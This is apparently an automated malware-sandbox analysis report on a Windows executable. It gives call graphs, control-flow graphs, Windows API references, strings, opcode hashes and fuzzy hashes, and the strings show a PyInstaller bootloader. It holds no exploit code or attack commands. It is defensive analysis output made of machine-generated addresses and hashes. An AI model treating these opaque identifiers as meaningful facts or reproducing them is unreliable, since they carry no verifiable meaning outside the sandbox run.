7ff6ceb2c74c 20764->20792 20766 7ff6ceb2c791 20766->20745 20768 7ff6ceb39de8 20767->20768 20769 7ff6ceb2c335 20767->20769 20770 7ff6ceb39e06 GetModuleFileNameW 20768->20770 20771 7ff6ceb39df0 20768->20771 20769->20751 20791 7ff6ceb2c85c InitializeSListHead 20769->20791 20775 7ff6ceb39e31 20770->20775 20772 7ff6ceb35cb4 _get_daylight 11 API calls 20771->20772 20773 7ff6ceb39df5 20772->20773 20774 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 20773->20774 20774->20769 20776 7ff6ceb39d68 11 API calls 20775->20776 20777 7ff6ceb39e71 20776->20777 20778 7ff6ceb39e79 20777->20778 20782 7ff6ceb39e91 20777->20782 20779 7ff6ceb35cb4 _get_daylight 11 API calls 20778->20779 20780 7ff6ceb39e7e 20779->20780 20781 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20780->20781 20781->20769 20783 7ff6ceb39eb3 20782->20783 20785 7ff6ceb39ef8 20782->20785 20786 7ff6ceb39edf 20782->20786 20784 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20783->20784 20784->20769 20789 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20785->20789 20787 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20786->20787 20788 7ff6ceb39ee8 20787->20788 20790 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20788->20790 20789->20783 20790->20769 20793 7ff6ceb2c766 20792->20793 20795 7ff6ceb2c75f 20792->20795 20796 7ff6ceb3af9c 20793->20796 20795->20766 20799 7ff6ceb3abd8 20796->20799 20806 7ff6ceb411a8 EnterCriticalSection 20799->20806 20525 7ff6ceb2a76d 20526 7ff6ceb2a772 20525->20526 20533 7ff6ceb2a8da 20526->20533 20534 7ff6ceb2a443 20526->20534 20535 7ff6ceb2b960 20526->20535 20527 7ff6ceb2b850 12 API calls 20531 7ff6ceb2a656 20527->20531 20529 7ff6ceb2b960 12 API calls 20530 7ff6ceb2abe8 20529->20530 20532 7ff6ceb2b960 12 API calls 20530->20532 20532->20534 20533->20529 20533->20534 20534->20527 20534->20531 20536 7ff6ceb2b9c0 20535->20536 20537 7ff6ceb2befa 20536->20537 20542 7ff6ceb2b9df 20536->20542 20538 7ff6ceb2c144 8 API calls 20537->20538 20539 7ff6ceb2beff 20538->20539 20540 7ff6ceb2c010 _wfindfirst32i64 8 API calls 20541 7ff6ceb2bedc 20540->20541 20541->20533 20542->20540 19878 7ff6ceb38670 19879 7ff6ceb386d7 19878->19879 19880 7ff6ceb3869e 19878->19880 19879->19880 19881 7ff6ceb386dc FindFirstFileExW 19879->19881 19882 7ff6ceb35cb4 _get_daylight 11 API calls 19880->19882 19883 7ff6ceb386fe GetLastError 19881->19883 19884 7ff6ceb38745 19881->19884 19885 7ff6ceb386a3 19882->19885 19886 7ff6ceb38709 19883->19886 19887 7ff6ceb38735 19883->19887 19938 7ff6ceb388e0 19884->19938 19888 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 19885->19888 19886->19887 19893 7ff6ceb38725 19886->19893 19894 7ff6ceb38713 19886->19894 19891 7ff6ceb35cb4 _get_daylight 11 API calls 19887->19891 19895 7ff6ceb386ae 19888->19895 19891->19895 19892 7ff6ceb388e0 _wfindfirst32i64 10 API calls 19896 7ff6ceb3876b 19892->19896 19898 7ff6ceb35cb4 _get_daylight 11 API calls 19893->19898 19894->19887 19897 7ff6ceb38718 19894->19897 19899 7ff6ceb2c010 _wfindfirst32i64 8 API calls 19895->19899 19900 7ff6ceb388e0 _wfindfirst32i64 10 API calls 19896->19900 19901 7ff6ceb35cb4 _get_daylight 11 API calls 19897->19901 19898->19895 19902 7ff6ceb386c2 19899->19902 19903 7ff6ceb38779 19900->19903 19901->19895 19904 7ff6ceb41344 _wfindfirst32i64 37 API calls 19903->19904 19905 7ff6ceb38797 19904->19905 19905->19895 19906 7ff6ceb387a3 19905->19906 19907 7ff6ceb3b6b8 _wfindfirst32i64 17 API calls 19906->19907 19908 7ff6ceb387b7 19907->19908 19909 7ff6ceb387e1 19908->19909 19911 7ff6ceb38820 FindNextFileW 19908->19911 19910 7ff6ceb35cb4 _get_daylight 11 API calls 19909->19910 19912 7ff6ceb387e6 19910->19912 19913 7ff6ceb38870 19911->19913 19914 7ff6ceb3882f GetLastError 19911->19914 19915 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 19912->19915 19916 7ff6ceb388e0 _wfindfirst32i64 10 API calls 19913->19916 19917 7ff6ceb3883a 19914->19917 19918 7ff6ceb38863 19914->19918 19919 7ff6ceb387f1 19915->19919 19921 7ff6ceb38888 19916->19921 19917->19918 19924 7ff6ceb38856 19917->19924 19925 7ff6ceb38844 19917->19925 19920 7ff6ceb35cb4 _get_daylight 11 API calls 19918->19920 19922 7ff6ceb2c010 _wfindfirst32i64 8 API calls 19919->19922 19920->19919 19923 7ff6ceb388e0 _wfindfirst32i64 10 API calls 19921->19923 19926 7ff6ceb38804 19922->19926 19927 7ff6ceb38896 19923->19927 19929 7ff6ceb35cb4 _get_daylight 11 API calls 19924->19929 19925->19918 19928 7ff6ceb38849 19925->19928 19930 7ff6ceb388e0 _wfindfirst32i64 10 API calls 19927->19930 19931 7ff6ceb35cb4 _get_daylight 11 API calls 19928->19931 19929->19919 19932 7ff6ceb388a4 19930->19932 19931->19919 19933 7ff6ceb41344 _wfindfirst32i64 37 API calls 19932->19933 19934 7ff6ceb388c2 19933->19934 19934->19919 19935 7ff6ceb388ca 19934->19935 19936 7ff6ceb3b6b8 _wfindfirst32i64 17 API calls 19935->19936 19937 7ff6ceb388de 19936->19937 19939 7ff6ceb388f8 19938->19939 19940 7ff6ceb388fe FileTimeToSystemTime 19938->19940 19939->19940 19942 7ff6ceb38923 19939->19942 19941 7ff6ceb3890d SystemTimeToTzSpecificLocalTime 19940->19941 19940->19942 19941->19942 19943 7ff6ceb2c010 _wfindfirst32i64 8 API calls 19942->19943 19944 7ff6ceb3875d 19943->19944 19944->19892

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 63 7ff6ceb21000-7ff6ceb239b6 call 7ff6ceb30750 call 7ff6ceb30748 call 7ff6ceb289b0 call 7ff6ceb30748 call 7ff6ceb2bfb0 call 7ff6ceb35ae0 call 7ff6ceb366e8 call 7ff6ceb21ea0 81 7ff6ceb239bc-7ff6ceb239cc call 7ff6ceb23f00 63->81 82 7ff6ceb23b5f 63->82 81->82 87 7ff6ceb239d2-7ff6ceb239e5 call 7ff6ceb23dd0 81->87 84 7ff6ceb23b64-7ff6ceb23b84 call 7ff6ceb2c010 82->84 87->82 91 7ff6ceb239eb-7ff6ceb23a12 call 7ff6ceb27d70 87->91 94 7ff6ceb23a54-7ff6ceb23a7c call 7ff6ceb28250 call 7ff6ceb21ca0 91->94 95 7ff6ceb23a14-7ff6ceb23a23 call 7ff6ceb27d70 91->95 106 7ff6ceb23b2d-7ff6ceb23b3e 94->106 107 7ff6ceb23a82-7ff6ceb23a98 call 7ff6ceb21ca0 94->107 95->94 101 7ff6ceb23a25-7ff6ceb23a2b 95->101 103 7ff6ceb23a37-7ff6ceb23a51 call 7ff6ceb3576c call 7ff6ceb28250 101->103 104 7ff6ceb23a2d-7ff6ceb23a35 101->104 103->94 104->103 110 7ff6ceb23b40-7ff6ceb23b47 106->110 111 7ff6ceb23b92-7ff6ceb23b95 106->111 120 7ff6ceb23ab7-7ff6ceb23aba 107->120 121 7ff6ceb23a9a-7ff6ceb23ab2 call 7ff6ceb22b10 107->121 110->111 116 7ff6ceb23b49-7ff6ceb23b51 call 7ff6ceb28b80 110->116 114 7ff6ceb23b97-7ff6ceb23b9d 111->114 115 7ff6ceb23bab-7ff6ceb23bc3 call 7ff6ceb28de0 111->115 122 7ff6ceb23bdb-7ff6ceb23be8 call 7ff6ceb26ff0 114->122 123 7ff6ceb23b9f-7ff6ceb23ba9 114->123 130 7ff6ceb23bce-7ff6ceb23bd5 SetDllDirectoryW 115->130 131 7ff6ceb23bc5-7ff6ceb23bcc 115->131 132 7ff6ceb23b53 116->132 133 7ff6ceb23b85-7ff6ceb23b88 call 7ff6ceb214e0 116->133 120->106 124 7ff6ceb23abc-7ff6ceb23ad3 call 7ff6ceb24060 120->124 121->82 138 7ff6ceb23bea-7ff6ceb23bf7 call 7ff6ceb26ca0 122->138 139 7ff6ceb23c33-7ff6ceb23c38 call 7ff6ceb26f70 122->139 123->115 123->122 141 7ff6ceb23ada-7ff6ceb23b06 call 7ff6ceb284c0 124->141 142 7ff6ceb23ad5-7ff6ceb23ad8 124->142 130->122 137 7ff6ceb23b5a call 7ff6ceb22b10 131->137 132->137 146 7ff6ceb23b8d-7ff6ceb23b90 133->146 137->82 138->139 154 7ff6ceb23bf9-7ff6ceb23c08 call 7ff6ceb26800 138->154 149 7ff6ceb23c3d-7ff6ceb23c40 139->149 141->106 156 7ff6ceb23b08-7ff6ceb23b10 call 7ff6ceb3097c 141->156 147 7ff6ceb23b15-7ff6ceb23b2b call 7ff6ceb22b10 142->147 146->82 146->111 147->82 152 7ff6ceb23c46-7ff6ceb23c50 149->152 153 7ff6ceb23d11-7ff6ceb23d20 call 7ff6ceb234a0 149->153 157 7ff6ceb23c53-7ff6ceb23c5d 152->157 153->82 166 7ff6ceb23d26-7ff6ceb23d55 call 7ff6ceb28b50 call 7ff6ceb281e0 call 7ff6ceb27d70 call 7ff6ceb23600 153->166 170 7ff6ceb23c29-7ff6ceb23c2e call 7ff6ceb26a50 154->170 171 7ff6ceb23c0a-7ff6ceb23c16 call 7ff6ceb26780 154->171 156->147 163 7ff6ceb23c66-7ff6ceb23c68 157->163 164 7ff6ceb23c5f-7ff6ceb23c64 157->164 168 7ff6ceb23c6a-7ff6ceb23c8d call 7ff6ceb21ee0 163->168 169 7ff6ceb23cb1-7ff6ceb23cb7 163->169 164->157 164->163 199 7ff6ceb23d57-7ff6ceb23d74 PostMessageW GetMessageW 166->199 200 7ff6ceb23d7a-7ff6ceb23daa call 7ff6ceb28290 call 7ff6ceb26a50 call 7ff6ceb26f70 166->200 168->82 185 7ff6ceb23c93-7ff6ceb23c9d 168->185 173 7ff6ceb23cb9-7ff6ceb23cd6 PostMessageW GetMessageW 169->173 174 7ff6ceb23cdc-7ff6ceb23d0c call 7ff6ceb23600 call 7ff6ceb23440 call 7ff6ceb235f0 call 7ff6ceb26a50 call 7ff6ceb26f70 169->174 170->139 171->170 182 7ff6ceb23c18-7ff6ceb23c27 call 7ff6ceb26e40 171->182 173->174 174->84 182->149 186 7ff6ceb23ca0-7ff6ceb23caf 185->186 186->169 186->186 199->200 210 7ff6ceb23db8-7ff6ceb23dbb call 7ff6ceb21e70 200->210 211 7ff6ceb23dac-7ff6ceb23db3 call 7ff6ceb27f50 200->211 214 7ff6ceb23dc0-7ff6ceb23dc2 210->214 211->210 214->84
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$EnvironmentPost$DirectoryExpandFileModuleNameStringsVariable
                                                                                          • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                          • API String ID: 2647325126-1544818733
                                                                                          • Opcode ID: bd414e0ba7d804e29e6718c27cc7e8acd751ab09fec9afdc79f0f04ad45cb119
                                                                                          • Instruction ID: 72d59390b17211a9c6e83872396d39026dc85c01947fb7d3d86638752c770c25
                                                                                          • Opcode Fuzzy Hash: bd414e0ba7d804e29e6718c27cc7e8acd751ab09fec9afdc79f0f04ad45cb119
                                                                                          • Instruction Fuzzy Hash: EBC19222F1C68741FA29EF2196592BD6271BF76786F400132FACDE769ADF2CE5058700

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 263 7ff6ceb46b50-7ff6ceb46b8b call 7ff6ceb464d8 call 7ff6ceb464e0 call 7ff6ceb46548 270 7ff6ceb46b91-7ff6ceb46b9c call 7ff6ceb464e8 263->270 271 7ff6ceb46db5-7ff6ceb46e01 call 7ff6ceb3b6b8 call 7ff6ceb464d8 call 7ff6ceb464e0 call 7ff6ceb46548 263->271 270->271 276 7ff6ceb46ba2-7ff6ceb46bac 270->276 298 7ff6ceb46e07-7ff6ceb46e12 call 7ff6ceb464e8 271->298 299 7ff6ceb46f3f-7ff6ceb46fad call 7ff6ceb3b6b8 call 7ff6ceb423d0 271->299 279 7ff6ceb46bce-7ff6ceb46bd2 276->279 280 7ff6ceb46bae-7ff6ceb46bb1 276->280 283 7ff6ceb46bd5-7ff6ceb46bdd 279->283 282 7ff6ceb46bb4-7ff6ceb46bbf 280->282 285 7ff6ceb46bca-7ff6ceb46bcc 282->285 286 7ff6ceb46bc1-7ff6ceb46bc8 282->286 283->283 287 7ff6ceb46bdf-7ff6ceb46bf2 call 7ff6ceb3e3ac 283->287 285->279 289 7ff6ceb46bfb-7ff6ceb46c09 285->289 286->282 286->285 294 7ff6ceb46c0a-7ff6ceb46c16 call 7ff6ceb3b700 287->294 295 7ff6ceb46bf4-7ff6ceb46bf6 call 7ff6ceb3b700 287->295 303 7ff6ceb46c1d-7ff6ceb46c25 294->303 295->289 298->299 307 7ff6ceb46e18-7ff6ceb46e23 call 7ff6ceb46518 298->307 315 7ff6ceb46fbb-7ff6ceb46fbe 299->315 316 7ff6ceb46faf-7ff6ceb46fb6 299->316 303->303 306 7ff6ceb46c27-7ff6ceb46c38 call 7ff6ceb41344 303->306 306->271 317 7ff6ceb46c3e-7ff6ceb46c94 call 7ff6ceb4b580 * 4 call 7ff6ceb46a6c 306->317 307->299 318 7ff6ceb46e29-7ff6ceb46e4c call 7ff6ceb3b700 GetTimeZoneInformation 307->318 321 7ff6ceb46fc0 315->321 322 7ff6ceb46ff5-7ff6ceb47008 call 7ff6ceb3e3ac 315->322 320 7ff6ceb4704b-7ff6ceb4704e 316->320 375 7ff6ceb46c96-7ff6ceb46c9a 317->375 330 7ff6ceb46f14-7ff6ceb46f3e call 7ff6ceb464d0 call 7ff6ceb464c0 call 7ff6ceb464c8 318->330 331 7ff6ceb46e52-7ff6ceb46e73 318->331 326 7ff6ceb46fc3 call 7ff6ceb46dcc 320->326 328 7ff6ceb47054-7ff6ceb4705c call 7ff6ceb46b50 320->328 321->326 336 7ff6ceb4700a 322->336 337 7ff6ceb47013-7ff6ceb4702e call 7ff6ceb423d0 322->337 341 7ff6ceb46fc8-7ff6ceb46ff4 call 7ff6ceb3b700 call 7ff6ceb2c010 326->341 328->341 338 7ff6ceb46e7e-7ff6ceb46e85 331->338 339 7ff6ceb46e75-7ff6ceb46e7b 331->339 343 7ff6ceb4700c-7ff6ceb47011 call 7ff6ceb3b700 336->343 360 7ff6ceb47030-7ff6ceb47033 337->360 361 7ff6ceb47035-7ff6ceb47047 call 7ff6ceb3b700 337->361 344 7ff6ceb46e99 338->344 345 7ff6ceb46e87-7ff6ceb46e8f 338->345 339->338 343->321 350 7ff6ceb46e9b-7ff6ceb46f0f call 7ff6ceb4b580 * 4 call 7ff6ceb439ac call 7ff6ceb47064 * 2 344->350 345->344 352 7ff6ceb46e91-7ff6ceb46e97 345->352 350->330 352->350 360->343 361->320 377 7ff6ceb46c9c 375->377 378 7ff6ceb46ca0-7ff6ceb46ca4 375->378 377->378 378->375 380 7ff6ceb46ca6-7ff6ceb46ccb call 7ff6ceb375a8 378->380 387 7ff6ceb46cce-7ff6ceb46cd2 380->387 389 7ff6ceb46ce1-7ff6ceb46ce5 387->389 390 7ff6ceb46cd4-7ff6ceb46cdf 387->390 389->387 390->389 392 7ff6ceb46ce7-7ff6ceb46ceb 390->392 394 7ff6ceb46ced-7ff6ceb46d15 call 7ff6ceb375a8 392->394 395 7ff6ceb46d6c-7ff6ceb46d70 392->395 402 7ff6ceb46d17 394->402 403 7ff6ceb46d33-7ff6ceb46d37 394->403 396 7ff6ceb46d77-7ff6ceb46d84 395->396 397 7ff6ceb46d72-7ff6ceb46d74 395->397 400 7ff6ceb46d86-7ff6ceb46d9c call 7ff6ceb46a6c 396->400 401 7ff6ceb46d9f-7ff6ceb46dae call 7ff6ceb464d0 call 7ff6ceb464c0 396->401 397->396 400->401 401->271 407 7ff6ceb46d1a-7ff6ceb46d21 402->407 403->395 409 7ff6ceb46d39-7ff6ceb46d57 call 7ff6ceb375a8 403->409 407->403 410 7ff6ceb46d23-7ff6ceb46d31 407->410 415 7ff6ceb46d63-7ff6ceb46d6a 409->415 410->403 410->407 415->395 416 7ff6ceb46d59-7ff6ceb46d5d 415->416 416->395 417 7ff6ceb46d5f 416->417 417->415
                                                                                          APIs
                                                                                          • _get_daylight.LIBCMT ref: 00007FF6CEB46B95
                                                                                            • Part of subcall function 00007FF6CEB464E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB464FC
                                                                                            • Part of subcall function 00007FF6CEB3B700: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6CEB43B72,?,?,?,00007FF6CEB43BAF,?,?,00000000,00007FF6CEB44075,?,?,00000000,00007FF6CEB43FA7), ref: 00007FF6CEB3B716
                                                                                            • Part of subcall function 00007FF6CEB3B700: GetLastError.KERNEL32(?,?,?,00007FF6CEB43B72,?,?,?,00007FF6CEB43BAF,?,?,00000000,00007FF6CEB44075,?,?,00000000,00007FF6CEB43FA7), ref: 00007FF6CEB3B720
                                                                                            • Part of subcall function 00007FF6CEB3B6B8: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6CEB3B697,?,?,?,?,?,00007FF6CEB338BC), ref: 00007FF6CEB3B6C1
                                                                                            • Part of subcall function 00007FF6CEB3B6B8: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6CEB3B697,?,?,?,?,?,00007FF6CEB338BC), ref: 00007FF6CEB3B6E6
                                                                                          • _get_daylight.LIBCMT ref: 00007FF6CEB46B84
                                                                                            • Part of subcall function 00007FF6CEB46548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB4655C
                                                                                          • _get_daylight.LIBCMT ref: 00007FF6CEB46DFA
                                                                                          • _get_daylight.LIBCMT ref: 00007FF6CEB46E0B
                                                                                          • _get_daylight.LIBCMT ref: 00007FF6CEB46E1C
                                                                                          • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6CEB4705C), ref: 00007FF6CEB46E43
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                          • API String ID: 1458651798-239921721
                                                                                          • Opcode ID: 011d4974f3e124412289dc327b2b40947a146d65b03f6d5f747eb19bebd0a963
                                                                                          • Instruction ID: 4c6107a5b67ef2a8cf3e0f5a23e0de497d5fa635fd1582dbd2e33d89b3949da8
                                                                                          • Opcode Fuzzy Hash: 011d4974f3e124412289dc327b2b40947a146d65b03f6d5f747eb19bebd0a963
                                                                                          • Instruction Fuzzy Hash: 43D1E122A0861386EB24AF25D6911B96371FF66B86F444036FACDE7A99DF3CE441C740

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 448 7ff6ceb47a9c-7ff6ceb47b0f call 7ff6ceb477d0 451 7ff6ceb47b29-7ff6ceb47b33 call 7ff6ceb38c58 448->451 452 7ff6ceb47b11-7ff6ceb47b1a call 7ff6ceb35c94 448->452 457 7ff6ceb47b4e-7ff6ceb47bb7 CreateFileW 451->457 458 7ff6ceb47b35-7ff6ceb47b4c call 7ff6ceb35c94 call 7ff6ceb35cb4 451->458 459 7ff6ceb47b1d-7ff6ceb47b24 call 7ff6ceb35cb4 452->459 461 7ff6ceb47bb9-7ff6ceb47bbf 457->461 462 7ff6ceb47c34-7ff6ceb47c3f GetFileType 457->462 458->459 476 7ff6ceb47e6a-7ff6ceb47e8a 459->476 465 7ff6ceb47c01-7ff6ceb47c2f GetLastError call 7ff6ceb35c28 461->465 466 7ff6ceb47bc1-7ff6ceb47bc5 461->466 468 7ff6ceb47c41-7ff6ceb47c7c GetLastError call 7ff6ceb35c28 CloseHandle 462->468 469 7ff6ceb47c92-7ff6ceb47c99 462->469 465->459 466->465 474 7ff6ceb47bc7-7ff6ceb47bff CreateFileW 466->474 468->459 482 7ff6ceb47c82-7ff6ceb47c8d call 7ff6ceb35cb4 468->482 472 7ff6ceb47c9b-7ff6ceb47c9f 469->472 473 7ff6ceb47ca1-7ff6ceb47ca4 469->473 479 7ff6ceb47caa-7ff6ceb47cff call 7ff6ceb38b70 472->479 473->479 480 7ff6ceb47ca6 473->480 474->462 474->465 487 7ff6ceb47d01-7ff6ceb47d0d call 7ff6ceb479d8 479->487 488 7ff6ceb47d1e-7ff6ceb47d4f call 7ff6ceb47550 479->488 480->479 482->459 487->488 495 7ff6ceb47d0f 487->495 493 7ff6ceb47d51-7ff6ceb47d53 488->493 494 7ff6ceb47d55-7ff6ceb47d97 488->494 496 7ff6ceb47d11-7ff6ceb47d19 call 7ff6ceb3b878 493->496 497 7ff6ceb47db9-7ff6ceb47dc4 494->497 498 7ff6ceb47d99-7ff6ceb47d9d 494->498 495->496 496->476 501 7ff6ceb47e68 497->501 502 7ff6ceb47dca-7ff6ceb47dce 497->502 498->497 500 7ff6ceb47d9f-7ff6ceb47db4 498->500 500->497 501->476 502->501 504 7ff6ceb47dd4-7ff6ceb47e19 CloseHandle CreateFileW 502->504 505 7ff6ceb47e1b-7ff6ceb47e49 GetLastError call 7ff6ceb35c28 call 7ff6ceb38d98 504->505 506 7ff6ceb47e4e-7ff6ceb47e63 504->506 505->506 506->501
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                          • String ID:
                                                                                          • API String ID: 1617910340-0
                                                                                          • Opcode ID: 8482aad9305a30c551bfc572177b6762c68ebfb4afe3bdfce811c5be068ed5ba
                                                                                          • Instruction ID: 5fc4e276096950c4451c8325862d6f16519f77a08c1bed140287d8fc93793611
                                                                                          • Opcode Fuzzy Hash: 8482aad9305a30c551bfc572177b6762c68ebfb4afe3bdfce811c5be068ed5ba
                                                                                          • Instruction Fuzzy Hash: 04C1C137B28B5286EB10CF64C5916BC3771EB5AB99B000326EA9EA73D5CF38E455C700

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF6CEB2153F), ref: 00007FF6CEB27BF7
                                                                                            • Part of subcall function 00007FF6CEB27D70: GetEnvironmentVariableW.KERNEL32(00007FF6CEB239FF), ref: 00007FF6CEB27DAA
                                                                                            • Part of subcall function 00007FF6CEB27D70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6CEB27DC7
                                                                                            • Part of subcall function 00007FF6CEB38610: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB38629
                                                                                          • SetEnvironmentVariableW.KERNEL32 ref: 00007FF6CEB27CB1
                                                                                            • Part of subcall function 00007FF6CEB22B10: MessageBoxW.USER32 ref: 00007FF6CEB22BE5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                          • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                          • API String ID: 3752271684-1116378104
                                                                                          • Opcode ID: c156423b33866011d019db228dcac7379af2ead993036b2191ec76f2d14005c3
                                                                                          • Instruction ID: a89d22b2784ddd1c2578bbf6f4ff9cb1a204a404ac1f176de99a327cfdb8bcf1
                                                                                          • Opcode Fuzzy Hash: c156423b33866011d019db228dcac7379af2ead993036b2191ec76f2d14005c3
                                                                                          • Instruction Fuzzy Hash: A0518211B0975342FA14AF22AB1A2BA52616F77BC2F485435FD8EFB787ED2CE4018604
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                          • API String ID: 0-2665694366
                                                                                          • Opcode ID: 63f3ffa9379e1e3dea1ad36e367ec88dcfea323b25a29ef61fa4fbcfb838a92b
                                                                                          • Instruction ID: e90c45dfcfec1dee6f505f06b181eacf6a1783fb816b8d6e19643d5e97c34d9f
                                                                                          • Opcode Fuzzy Hash: 63f3ffa9379e1e3dea1ad36e367ec88dcfea323b25a29ef61fa4fbcfb838a92b
                                                                                          • Instruction Fuzzy Hash: EA52D372A146A68BD7648F14D69CB7E3BB9EF65341F024139E68AA7780DF3CD844CB40

                                                                                          Control-flow Graph

                                                                                          • Executed
